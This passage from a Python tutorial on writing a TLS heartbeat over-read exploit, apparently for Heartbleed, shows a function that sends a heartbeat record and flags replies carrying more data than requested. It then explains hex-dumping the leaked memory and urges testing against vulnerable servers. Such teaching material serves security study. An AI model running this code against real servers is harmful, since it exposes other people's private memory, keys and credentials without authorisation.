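

def check_heartbeat(sock):
    """Send the heartbeat and return (status, payload) describing the reply."""
    sock.send(HEARTBEAT)
    header = recvall(sock, 5)
    if header is None:
        return "no response", b""
    content_type, _version, length = struct.unpack(">BHH", header)
    payload = recvall(sock, length)
    if payload is None:
        return "incomplete response", b""
    if content_type == 24:  # heartbeat
        if len(payload) > 3:
            return "more data than requested", payload
        return "heartbeat without extra data", payload
    if content_type == 21:  # alert
        return "alert", payload
    return "unexpected record", payload
```

Returning a status alongside the payload keeps the decision about logging, dumping or exiting in the calling code.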

Dumping the contents of the payload is the last thing you need to do for this exploit to be successful. You should always provide a dump of the information whether the exploit is successful or not as it can provide useful information such as why the exploit may have failed, or just as proof that the exploit was successful.

There is conveniently a Python library that can convert the bytes we received from our socket into a “pretty printed” hexadecimal version for you. It can be installed using pipenv install hexdump.

The usage is also straightforward, where s is the bytes object we received:

>>> dump(s, size=2, sep='-')
02-46
>>> dump(s, size=2, sep=' ')
02 46
>>> dump(s, size=4, sep=' ')
0246

The size argument specifies the length of the text chunks, while sep determines what is used as the divider between each chunk. When dumping network information, we traditionally use a size of two, with a space as the sep.
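
If you would rather not install anything, the standard library can get you most of the way there. The sketch below uses bytes.hex(), which accepts a separator from Python 3.8 onwards; it is an alternative to the hexdump package, not part of it, and note that it produces lowercase digits.

```python
payload = b"\x02\x46"

# One separator between every byte.
print(payload.hex("-"))
print(payload.hex(" "))

# No separator at all.
print(payload.hex())

# The optional second argument groups several bytes per chunk.
print(b"\x02\x46\x00\x01".hex(" ", 2))
```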

You can now start testing your code against vulnerable servers! A useful resource for debugging potential issues is RFC 5246, the TLS 1.2 specification, and specifically Appendix A.3, which covers Alert Messages.